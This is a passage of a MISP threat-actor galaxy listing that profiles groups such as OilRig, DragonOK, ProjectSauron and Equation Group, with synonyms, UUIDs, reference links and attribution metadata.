- https://unit42.paloaltonetworks.com/atoms/thirstygemini/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | India |
cfr-suspected-victims | ['Bangladesh', 'Sri Lanka', 'Pakistan'] |
cfr-target-category | ['Private sector', 'Military'] |
cfr-type-of-incident | Espionage |
country | IN |
targeted-sector | ['Finance', 'Diplomacy'] |
Related clusters
To see the related clusters, click here.
Scarlet Mimic
Scarlet Mimic is a threat group that has targeted minority rights activists. This group has not been directly linked to a government source, but the group’s motivations appear to overlap with those of the Chinese government. While there is some overlap between IP addresses used by Scarlet Mimic and Putter Panda, APT 2, it has not been concluded that the groups are the same. The attacks began over four years ago and their targeting pattern suggests that this adversary’s primary mission is to gather information about minority rights activists. We do not have evidence directly linking these attacks to a government source, but the information derived from these activities supports an assessment that a group or groups with motivations similar to the stated position of the Chinese government in relation to these targets is involved. The attacks we attribute to Scarlet Mimic have primarily targeted Uyghur and Tibetan activists as well as those who are interested in their causes. Both the Tibetan community and the Uyghurs, a Turkic Muslim minority residing primarily in northwest China, have been targets of multiple sophisticated attacks in the past decade. Both also have history of strained relationships with the government of the People’s Republic of China (PRC), though we do not have evidence that links Scarlet Mimic attacks to the PRC. Scarlet Mimic attacks have also been identified against government organizations in Russia and India, who are responsible for tracking activist and terrorist activities. While we do not know the precise target of each of the Scarlet Mimic attacks, many of them align to the patterns described above.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Scarlet Mimic.
Known Synonyms |
---|
G0029 |
Golfing Taurus |
Internal MISP references
UUID 0da10682-85c6-4c0b-bace-ba1f7adfb63e
which can be used as unique global reference for Scarlet Mimic
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
targeted-sector | ['Activists'] |
Related clusters
To see the related clusters, click here.
Poseidon Group
Poseidon Group is a Portuguese-speaking threat group that has been active since at least 2005. The group has a history of using information exfiltrated from victims to blackmail victim companies into contracting the Poseidon Group as a security firm.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Poseidon Group.
Known Synonyms |
---|
G0033 |
Internal MISP references
UUID 5fc09923-fcff-4e81-9cae-4518ef31cf4d
which can be used as unique global reference for Poseidon Group
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | BR |
Related clusters
To see the related clusters, click here.
DragonOK
Threat group that has targeted Japanese organizations with phishing emails. Due to overlapping TTPs, including similar custom tools, DragonOK is thought to have a direct or indirect relationship with the threat group Moafee. 2223 It is known to use a variety of malware, including Sysget/HelloBridge, PlugX, PoisonIvy, FormerFirstRat, NFlog, and NewCT.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DragonOK.
Known Synonyms |
---|
BRONZE OVERBROOK |
G0002 |
G0017 |
Moafee |
Shallow Taurus |
Internal MISP references
UUID a9b44750-992c-4743-8922-129880d277ea
which can be used as unique global reference for DragonOK
in MISP communities and other software using the MISP galaxy
External references
- https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf - webarchive
- https://attack.mitre.org/wiki/Groups - webarchive
- https://www.forcepoint.com/de/blog/x-labs/trojanized-adobe-installer-used-install-dragonok-s-new-custom-backdoor - webarchive
- https://github.com/m0n0ph1/APT_CyberCriminal_Campagin_Collections-1/blob/master/2017/2017.02.15.deep-dive-dragonok-rambo-backdoor/Deep%20Dive%20on%20the%20DragonOK%20Rambo%20Backdoor%20_%20Morphick%20Cyber%20Security.pdf - webarchive
- https://www.cfr.org/interactive/cyber-operations/moafee - webarchive
- https://unit42.paloaltonetworks.com/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/ - webarchive
- https://www.phnompenhpost.com/national/kingdom-targeted-new-malware - webarchive
- https://attack.mitre.org/groups/G0017/ - webarchive
- https://attack.mitre.org/groups/G0002/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-overbrook - webarchive
- https://unit42.paloaltonetworks.com/atoms/shallowtaurus/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['United States'] |
cfr-target-category | ['Private sector'] |
cfr-type-of-incident | Espionage |
country | CN |
Related clusters
To see the related clusters, click here.
ProjectSauron
ProjectSauron is the name for a top level modular cyber-espionage platform, designed to enable and manage long-term campaigns through stealthy survival mechanisms coupled with multiple exfiltration methods. Technical details show how attackers learned from other extremely advanced actors in order to avoid repeating their mistakes. As such, all artifacts are customized per given target, reducing their value as indicators of compromise for any other victim. Usually APT campaigns have a geographical nexus, aimed at extracting information within a specific region or from a given industry. That usually results in several infections in countries within that region, or in the targeted industry around the world. Interestingly, ProjectSauron seems to be dedicated to just a couple of countries, focused on collecting high value intelligence by compromising almost all key entities it could possibly reach within the target area. The name, ProjectSauron reflects the fact that the code authors refer to ‘Sauron’ in the Lua scripts.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ProjectSauron.
Known Synonyms |
---|
G0041 |
Project Sauron |
Sauron |
Strider |
Internal MISP references
UUID f3179cfb-9c86-4980-bd6b-e4fa74adaaa7
which can be used as unique global reference for ProjectSauron
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/analysis/publications/75533/faq-the-projectsauron-apt/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/project-sauron - webarchive
- https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07190154/The-ProjectSauron-APT_research_KL.pdf - webarchive
- https://attack.mitre.org/groups/G0041/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | United States |
cfr-suspected-victims | ['Russia', 'Iran', 'Belgium', 'China', 'Sweden', 'Rwanda'] |
cfr-target-category | ['Government', 'Military'] |
cfr-type-of-incident | Espionage |
country | US |
targeted-sector | ['Intelligence'] |
Related clusters
To see the related clusters, click here.
TA530
TA530, who we previously examined in relation to large-scale personalized phishing campaigns
Internal MISP references
UUID 4b79d1f6-8333-44b6-ac32-d1ea7e47e77f
which can be used as unique global reference for TA530
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
GCMAN
GCMAN is a threat group that focuses on targeting banks for the purpose of transferring money to e-currency services.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GCMAN.
Known Synonyms |
---|
G0036 |
Internal MISP references
UUID d93889de-b4bc-4a29-9ce7-d67717c140a0
which can be used as unique global reference for GCMAN
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | RU |
targeted-sector | ['Bank'] |
Related clusters
To see the related clusters, click here.
APT22
Suckfly is a China-based threat group that has been active since at least 2014
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT22.
Known Synonyms |
---|
BRONZE OLIVE |
G0039 |
Group 46 |
Suckfly |
Internal MISP references
UUID 5abb12e7-5066-4f84-a109-49a037205c76
which can be used as unique global reference for APT22
in MISP communities and other software using the MISP galaxy
External references
- https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=62e325ae-f551-4855-b9cf-28a7d52d1534&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments - webarchive
- https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7a60af1f-7786-446c-976b-7c71a16e9d3b&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments - webarchive
- https://attack.mitre.org/groups/G0039/ - webarchive
- https://exchange.xforce.ibmcloud.com/collection/Suckfly-APT-aa8af56fd12d25c98fc49ca5341160ab - webarchive
- http://www.slideshare.net/CTruncer/ever-present-persistence-established-footholds-seen-in-the-wild - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-olive - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
Related clusters
To see the related clusters, click here.
FIN6
FIN is a group targeting financial assets including assets able to do financial transaction including PoS.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FIN6.
Known Synonyms |
---|
ATK88 |
Camouflage Tempest |
G0037 |
GOLD FRANKLIN |
ITG08 |
MageCart Group 6 |
SKELETON SPIDER |
White Giant |
Internal MISP references
UUID 647894f6-1723-4cba-aba4-0ef0966d5302
which can be used as unique global reference for FIN6
in MISP communities and other software using the MISP galaxy
External references
- https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf - webarchive
- https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html - webarchive
- https://attack.mitre.org/groups/G0037/ - webarchive
- https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/ - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-franklin - webarchive
- https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
Related clusters
To see the related clusters, click here.
Libyan Scorpions
Libyan Scorpions is a malware operation in use since September 2015 and operated by a politically motivated group whose main objective is intelligence gathering, spying on influentials and political figures and operate an espionage campaign within Libya.
Internal MISP references
UUID 815cbe98-e157-4078-9caa-c5a25dd64731
which can be used as unique global reference for Libyan Scorpions
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | LY |
targeted-sector | ['Intelligence'] |
TeamXRat
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TeamXRat.
Known Synonyms |
---|
CorporacaoXRat |
CorporationXRat |
Internal MISP references
UUID 43ec65d1-a334-4c44-9a44-0fd21f27249d
which can be used as unique global reference for TeamXRat
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
OilRig
OilRig is an Iranian threat group operating primarily in the Middle East by targeting organizations in this region that are in a variety of different industries; however, this group has occasionally targeted organizations outside of the Middle East as well. It also appears OilRig carries out supply chain attacks, where the threat group leverages the trust relationship between organizations to attack their primary targets.
OilRig is an active and organized threat group, which is evident based on their systematic targeting of specific organizations that appear to be carefully chosen for strategic purposes. Attacks attributed to this group primarily rely on social engineering to exploit the human rather than software vulnerabilities; however, on occasion this group has used recently patched vulnerabilities in the delivery phase of their attacks. The lack of software vulnerability exploitation does not necessarily suggest a lack of sophistication, as OilRig has shown maturity in other aspects of their operations. Such maturities involve:
-Organized evasion testing used the during development of their tools. -Use of custom DNS Tunneling protocols for command and control (C2) and data exfiltration. -Custom web-shells and backdoors used to persistently access servers.
OilRig relies on stolen account credentials for lateral movement. After OilRig gains access to a system, they use credential dumping tools, such as Mimikatz, to steal credentials to accounts logged into the compromised system. The group uses these credentials to access and to move laterally to other systems on the network. After obtaining credentials from a system, operators in this group prefer to use tools other than their backdoors to access the compromised systems, such as remote desktop and putty. OilRig also uses phishing sites to harvest credentials to individuals at targeted organizations to gain access to internet accessible resources, such as Outlook Web Access.
Since at least 2014, an Iranian threat group tracked by FireEye as APT34 has conducted reconnaissance aligned with the strategic interests of Iran. The group conducts operations primarily in the Middle East, targeting financial, government, energy, chemical, telecommunications and other industries. Repeated targeting of Middle Eastern financial, energy and government organizations leads FireEye to assess that those sectors are a primary concern of APT34. The use of infrastructure tied to Iranian operations, timing and alignment with the national interests of Iran also lead FireEye to assess that APT34 acts on behalf of the Iranian government.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular OilRig.
Known Synonyms |
---|
APT 34 |
APT34 |
ATK40 |
Cobalt Gypsy |
Crambus |
EUROPIUM |
Evasive Serpens |
G0049 |
Hazel Sandstorm |
Helix Kitten |
IRN2 |
TA452 |
Twisted Kitten |
Internal MISP references
UUID 42be2a84-5a5c-4c6d-9864-3f09d75bb0ba
which can be used as unique global reference for OilRig
in MISP communities and other software using the MISP galaxy
External references
- https://blog.morphisec.com/iranian-fileless-cyberattack-on-israel-word-vulnerability - webarchive
- https://unit42.paloaltonetworks.com/unit42-striking-oil-closer-look-adversary-infrastructure/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-introducing-the-adversary-playbook-first-up-oilrig/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-twoface-webshell-persistent-access-point-lateral-movement/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-analyzing-oilrigs-ops-tempo-testing-weaponization-delivery/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-oilrig-group-steps-attacks-new-delivery-documents-new-injector-trojan/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/ - webarchive
- https://unit42.paloaltonetworks.com/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/ - webarchive
- https://pan-unit42.github.io/playbook_viewer/ - webarchive
- https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html - webarchive
- https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html - webarchive
- https://www.gov.il/BlobFolder/reports/attack_il/he/CERT-IL-ALERT-W-120.pdf - webarchive
- https://www.forbes.com/sites/thomasbrewster/2017/02/15/oilrig-iran-hackers-cyberespionage-us-turkey-saudi-arabia/#56749aa2468a - webarchive
- https://raw.githubusercontent.com/pan-unit42/playbook_viewer/master/playbook_json/oilrig.json - webarchive
- https://www.cfr.org/interactive/cyber-operations/oilrig - webarchive
- https://www.cfr.org/interactive/cyber-operations/apt-34 - webarchive
- https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/ - webarchive
- https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail - webarchive
- https://web.archive.org/web/20120818235442/https://www.symantec.com/connect/blogs/shamoon-attacks - webarchive
- https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ad6f8259-2bb4-4f7f-b8e1-710b35a4cbed&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments - webarchive
- https://www.clearskysec.com/oilrig/ - webarchive
- https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems/ - webarchive
- https://attack.mitre.org/groups/G0049/ - webarchive
- https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/ - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-gypsy - webarchive
- https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf - webarchive
- https://www.wired.com/story/apt-34-iranian-hackers-critical-infrastructure-companies/ - webarchive
- https://unit42.paloaltonetworks.com/atoms/evasive-serpens/ - webarchive
- https://www.microsoft.com/security/blog/2022/09/08/microsoft-investigates-iranian-attacks-against-the-albanian-government/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Iran (Islamic Republic of) |
cfr-suspected-victims | ['Israel', 'Kuwait', 'United States', 'Turkey', 'Saudi Arabia', 'Qatar', 'Lebanon', 'Middle East'] |
cfr-target-category | ['Government', 'Private sector', 'Civil society'] |
cfr-type-of-incident | Espionage |
country | IR |
targeted-sector | ['Chemical', 'Energy', 'Engineering', 'Finance', 'Government, Administration', 'Telecoms', 'Other'] |
Related clusters
To see the related clusters, click here.
Volatile Cedar
Beginning in late 2012, a carefully orchestrated attack campaign we call Volatile Cedar has been targeting individuals, companies and institutions worldwide. This campaign, led by a persistent attacker group, has successfully penetrated a large number of targets using various attack techniques, and specifically, a custom-made malware implant codenamed Explosive.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Volatile Cedar.
Known Synonyms |
---|
DeftTorero |
Lebanese Cedar |
Internal MISP references
UUID cf421ce6-ddfe-419a-bc65-6a9fc953232a
which can be used as unique global reference for Volatile Cedar
in MISP communities and other software using the MISP galaxy
External references
- https://blog.checkpoint.com/2015/03/31/volatilecedar/ - webarchive
- https://blog.checkpoint.com/2015/06/09/new-data-volatile-cedar/ - webarchive
- https://securelist.com/sinkholing-volatile-cedar-dga-infrastructure/69421/ - webarchive
- https://www.clearskysec.com/wp-content/uploads/2021/01/Lebanese-Cedar-APT.pdf - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/03/20082004/volatile-cedar-technical-report.pdf - webarchive
- https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | LB |
suspected-victims | ['Middle East', 'Israel', 'Lebanon', 'Saudi Arabia'] |
Related clusters
To see the related clusters, click here.
Dancing Salome
Dancing Salome is the Kaspersky codename for an APT actor with a primary focus on ministries of foreign affairs, think tanks, and Ukraine. What makes Dancing Salome interesting and relevant is the attacker’s penchant for leveraging HackingTeam RCS implants compiled after the public breach.
Internal MISP references
UUID 3d5192f2-f235-46fd-aa68-dd00cc17d632
which can be used as unique global reference for Dancing Salome
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
suspected-victims | ['Ukraine'] |
targeted-sector | ['Think Tanks', 'Government, Administration'] |
TERBIUM
Microsoft Threat Intelligence identified similarities between this recent attack and previous 2012 attacks against tens of thousands of computers belonging to organizations in the energy sector. Microsoft Threat Intelligence refers to the activity group behind these attacks as TERBIUM, following our internal practice of assigning rogue actors chemical element names.
Internal MISP references
UUID 46670c51-fea4-45d6-bdd4-62e85a5c7404
which can be used as unique global reference for TERBIUM
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
targeted-sector | ['Energy'] |
Related clusters
To see the related clusters, click here.
Molerats
In October 2012, malware attacks against Israeli government targets grabbed media attention as officials temporarily cut off Internet access for its entire police force and banned the use of USB memory sticks. Security researchers subsequently linked these attacks to a broader, yearlong campaign that targeted not just Israelis but Palestinians as well. and as discovered later, even the U.S. and UK governments. Further research revealed a connection between these attacks and members of the so-called “Gaza Hackers Team.” We refer to this campaign as “Molerats.”
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Molerats.
Known Synonyms |
---|
ALUMINUM SARATOGA |
BLACKSTEM |
Extreme Jackal |
G0021 |
Gaza Cybergang |
Gaza Hackers Team |
Gaza cybergang |
Moonlight |
Operation Molerats |
Internal MISP references
UUID f7c2e501-73b1-400f-a5d9-2e2e07b7dfde
which can be used as unique global reference for Molerats
in MISP communities and other software using the MISP galaxy
External references
- https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html - webarchive
- https://ti.360.net/blog/articles/suspected-molerats-new-attack-in-the-middle-east/ - webarchive
- https://ti.360.net/blog/articles/suspected-molerats-new-attack-in-the-middle-east-en/ - webarchive
- https://middle-east-online.com/en/cyber-war-gaza-hackers-deface-israel-fire-service-website - webarchive
- https://www.fireeye.com/blog/threat-research/2014/06/molerats-here-for-spring.html - webarchive
- https://pwc.blogs.com/cyber_security_updates/2015/04/attacks-against-israeli-palestinian-interests.html - webarchive
- https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks - webarchive
- https://securelist.com/gaza-cybergang-wheres-your-ir-team/72283/ - webarchive
- https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf - webarchive
- https://www.clearskysec.com/wp-content/uploads/2016/06/Operation-DustySky2_-6.2016_TLP_White.pdf - webarchive
- https://securelist.com/gaza-cybergang-updated-2017-activity/82765/ - webarchive
- https://www.kaspersky.com/blog/gaza-cybergang/26363/ - webarchive
- https://attack.mitre.org/groups/G0021/ - webarchive
- https://www.secureworks.com/research/threat-profiles/aluminum-saratoga - webarchive
- https://services.google.com/fh/files/misc/tool-of-first-resort-israel-hamas-war-cyber.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-state-sponsor | Palestine |
cfr-suspected-victims | ['United States', 'Israel', 'Palestine', 'Middle East', 'Europe'] |
cfr-target-category | ['Government', 'Defense', 'Energy', 'Finance', 'Healthcare', 'Pharmaceuticals', 'Education', 'Media', 'NGOs', 'Civil Society', 'Legal', 'Military'] |
cfr-type-of-incident | Espionage |
country | PS |
Related clusters
To see the related clusters, click here.
PROMETHIUM
PROMETHIUM is an activity group that has been active as early as 2012. The group primarily uses Truvasys, a first-stage malware that has been in circulation for several years. Truvasys has been involved in several attack campaigns, where it has masqueraded as one of server common computer utilities, including WinUtils, TrueCrypt, WinRAR, or SanDisk. In each of the campaigns, Truvasys malware evolved with additional features—this shows a close relationship between the activity groups behind the campaigns and the developers of the malware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PROMETHIUM.
Known Synonyms |
---|
G0056 |
StrongPity |
Internal MISP references
UUID 43894e2a-174e-4931-94a8-2296afe8f650
which can be used as unique global reference for PROMETHIUM
in MISP communities and other software using the MISP galaxy
External references
- https://www.microsoft.com/security/blog/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/ - webarchive
- https://www.virusbulletin.com/conference/vb2016/abstracts/last-minute-paper-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users - webarchive
- https://attack.mitre.org/groups/G0056/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | TR |
Related clusters
To see the related clusters, click here.
NEODYMIUM
NEODYMIUM is an activity group that is known to use a backdoor malware detected by Microsoft as Wingbird. This backdoor’s characteristics closely match FinFisher, a government-grade commercial surveillance package. Data about Wingbird activity indicate that it is typically used to attack individual computers instead of networks.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular NEODYMIUM.
Known Synonyms |
---|
G0055 |
Internal MISP references
UUID ada08ea8-4517-4eea-aff1-3ad69e5466bb
which can be used as unique global reference for NEODYMIUM
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Related clusters
To see the related clusters, click here.
Packrat
A threat group that has been active for at least seven years has used malware, phishing and disinformation tactics to target activists, journalists, politicians and public figures in various Latin American countries. The threat actor, dubbed Packrat based on its preference for remote access Trojans (RATs) and because it has used the same infrastructure for several years, has been analyzed by Citizen Lab researchers John Scott-Railton, Morgan Marquis-Boire, and Claudio Guarnieri, and Cyphort researcher Marion Marschalek, best known for her extensive analysis of state-sponsored threats.
Internal MISP references
UUID fe344665-d153-4d31-a32a-1509efde1ca7
which can be used as unique global reference for Packrat
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
targeted-sector | ['Activists', 'Journalist', 'Political party'] |
Cadelle
Symantec telemetry identified Cadelle and Chafer activity dating from as far back as July 2014, however, it’s likely that activity began well before this date. Command-and-control (C&C) registrant information points to activity possibly as early as 2011, while executable compilation times suggest early 2012. Their attacks continue to the present day. Symantec estimates that each team is made up of between 5 and 10 people.
Internal MISP references
UUID 03f13462-003c-4296-8784-bccea16710a9
which can be used as unique global reference for Cadelle
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | IR |
PassCV
The PassCV group continues to be one of the most successful and active threat groups that leverage a wide array of stolen Authenticode-signing certificates. Snorre Fagerland of Blue Coat Systems first coined the term PassCV in a blog post. His post provides a good introduction to the group and covers some of the older infrastructure, stolen code-signing certificate reuse, and other connections associated with the PassCV malware. There are several clues alluding to the possibility that multiple groups may be utilizing the same stolen signing certificates, but at this time SPEAR believes the current attacks are more likely being perpetrated by a single group employing multiple publicly available Remote Administration Tools (RATs). The PassCV group has been operating with continued success and has already started to expand their malware repertoire into different off-the-shelf RATs and custom code. SPEAR identified eighteen previously undisclosed stolen Authenticode certificates. These certificates were originally issued to companies and individuals scattered across China, Taiwan, Korea, Europe, the United States and Russia. In this post we expand the usage of the term ‘PassCV’ to encompass the malware mentioned in the Blue Coat Systems report, as well as the APT group behind the larger C2 infrastructure and stolen Authenticode certificates. We’d like to share some of our findings as they pertain to the stolen certificates, command and control infrastructure, and some of the newer custom RATs they’ve begun development on.
Internal MISP references
UUID ceae0bc4-eb5f-4184-b949-a6f7d6f0f965
which can be used as unique global reference for PassCV
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
Sath-ı Müdafaa
A Turkish hacking group, Sath-ı Müdafaa, is encouraging individuals to join its DDoS-for-Points platform that features points and prizes for carrying out distributed denial-of-service (DDoS) attacks against a list of predetermined targets. Their DDoS tool also contains a backdoor to hack the hackers. So the overarching motivation and allegiance of the group is not entirely clear.
Internal MISP references
UUID a03e2b4b-617f-4d28-ac4b-9943f792aa22
which can be used as unique global reference for Sath-ı Müdafaa
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | TR |
motive | Hacktivists-Nationalists |
Aslan Neferler Tim
Turkish nationalist hacktivist group that has been active for roughly one year. According to Domaintools, the group’s site has been registered since December 2015, with an active Twitter account since January 2016. The group carries out distributed denial-of-service (DDoS) attacks and defacements against the sites of news organizations and governments perceived to be critical of Turkey’s policies or leadership, and purports to act in defense of Islam
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Aslan Neferler Tim.
Known Synonyms |
---|
Lion Soldiers Team |
Phantom Turk |
Internal MISP references
UUID 23410d3f-c359-422d-9a4e-45f8fdf0c84a
which can be used as unique global reference for Aslan Neferler Tim
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | TR |
motive | Hacktivists-Nationalists |
targeted-sector | ['Government, Administration', 'News - Media'] |
Ayyıldız Tim
Ayyıldız (Crescent and Star) Tim is a nationalist hacking group founded in 2002. It performs defacements and DDoS attacks against the websites of governments that it considers to be repressing Muslim minorities or engaged in Islamophobic policies.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ayyıldız Tim.
Known Synonyms |
---|
Crescent and Star |
Internal MISP references
UUID ab1771de-25bb-4688-b132-eabb5d6452a1
which can be used as unique global reference for Ayyıldız Tim
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | TR |
motive | Hacktivists-Nationalists |
targeted-sector | ['Government, Administration'] |
TurkHackTeam
Founded in 2004, Turkhackteam is one of Turkey’s oldest and most high-profile hacking collectives. According to a list compiled on Turkhackteam’s forum, the group has carried out almost 30 highly publicized hacking campaigns targeting foreign government and commercial websites, including websites of international corporations.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TurkHackTeam.
Known Synonyms |
---|
Turk Hack Team |
Internal MISP references
UUID 7ae74dc6-ded3-4873-a803-abb4160d10c0
which can be used as unique global reference for TurkHackTeam
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | TR |
motive | Hacktivists-Nationalists |
Equation Group
The Equation Group is a highly sophisticated threat actor described by its discoverers at Kaspersky Labs as one of the most sophisticated cyber attack groups in the world, operating alongside but always from a position of superiority with the creators of Stuxnet and Flame
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Equation Group.
Known Synonyms |
---|
EQGRP |
G0020 |
Tilded Team |
Internal MISP references
UUID 7036fb3d-86b7-4d9c-bc66-1e1ead8b7840
which can be used as unique global reference for Equation Group
in MISP communities and other software using the MISP galaxy
External references
- https://en.wikipedia.org/wiki/Equation_Group - webarchive
- https://www.cfr.org/interactive/cyber-operations/equation-group - webarchive
- https://arstechnica.com/information-technology/2015/02/how-omnipotent-hackers-tied-to-the-nsa-hid-for-14-years-and-were-found-at-last/ - webarchive
- https://www.dropbox.com/s/buxkfotx1kei0ce/Whitepaper%20Shadow%20Broker%20-%20Equation%20Group%20Hack.pdf?dl=0 - webarchive
- https://en.wikipedia.org/wiki/Stuxnet - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf - webarchive
- https://attack.mitre.org/groups/G0020/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | United States |
cfr-suspected-victims | ['Iran', 'Afghanistan', 'Syria', 'Yemen', 'Kenya', 'Russia', 'India', 'Mali', 'Algeria', 'United Kingdom', 'Pakistan', 'China', 'Lebanon', 'United Arab Emirates', 'Libya'] |
cfr-target-category | ['Government', 'Military'] |
cfr-type-of-incident | Espionage |
country | US |
Related clusters
To see the related clusters, click here.
Greenbug
